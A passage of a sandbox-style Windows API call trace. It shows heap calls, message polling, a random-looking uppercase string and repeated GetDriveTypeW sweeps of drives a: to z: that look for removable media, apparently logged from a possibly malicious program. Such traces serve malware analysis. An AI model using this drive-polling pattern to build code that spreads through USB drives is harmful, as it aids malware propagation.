| out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.655] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.656] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.656] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.656] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.656] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.656] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.657] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.657] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.658] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.659] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.660] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.660] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.660] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.660] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0214.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0214.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0214.661] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0214.677] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.677] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.677] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.677] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.677] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.678] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.678] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.678] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.678] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.678] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.679] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.680] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.681] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.682] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.682] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0214.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0214.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.683] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.683] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.683] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.683] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.683] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.683] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.684] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.684] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.684] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.684] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.684] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.684] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.685] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.686] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.686] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.686] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.686] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.686] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.687] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.688] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.688] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.688] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.688] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.688] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.688] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.688] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.689] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.689] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.690] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.690] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.690] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.690] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.690] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.719] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.719] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.720] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.721] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.721] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.721] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.721] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.722] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.722] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.723] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.723] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.723] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.723] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.723] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.723] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.723] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.724] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.724] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.724] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.724] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.724] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.725] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.726] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.727] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.727] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.727] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.727] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.727] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 